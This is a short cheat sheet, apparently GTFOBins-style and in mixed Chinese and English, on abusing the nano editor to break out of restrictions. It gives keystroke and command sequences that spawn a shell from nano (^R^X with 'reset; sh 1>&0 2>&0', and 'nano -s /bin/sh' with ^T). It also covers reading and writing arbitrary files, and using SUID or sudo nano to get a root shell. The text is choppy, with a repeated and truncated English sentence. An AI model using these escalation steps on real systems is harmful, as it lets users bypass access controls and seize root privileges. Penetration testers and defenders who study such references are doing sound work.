用来生成一个交互式的系统shell。
nano
^R^X
reset; sh 1>&0 2>&0
The SPELL
environment variable can be used in place of the -s
option if the command line cannot be changed. nano -s /bin/sh
/bin/sh
^T
将数据写入文件中。
nano 要写入的文件
DATA
^O
从文件中读取数据。
nano 要读取的文件路径
suid是一种授予文件的权限类型,它允许用户使用者以文件所有者的权限来执行文件。
SPELL
environment variable can be used in place of the -s
option if the command line cannot be changed. ./nano -s /bin/sh
/bin/sh
^T
如果二进制文件被 sudo 允许以超级用户身份运行,可能被用于访问文件系统、提升或维持特权访问。
sudo nano
^R^X
reset; sh 1>&0 2>&0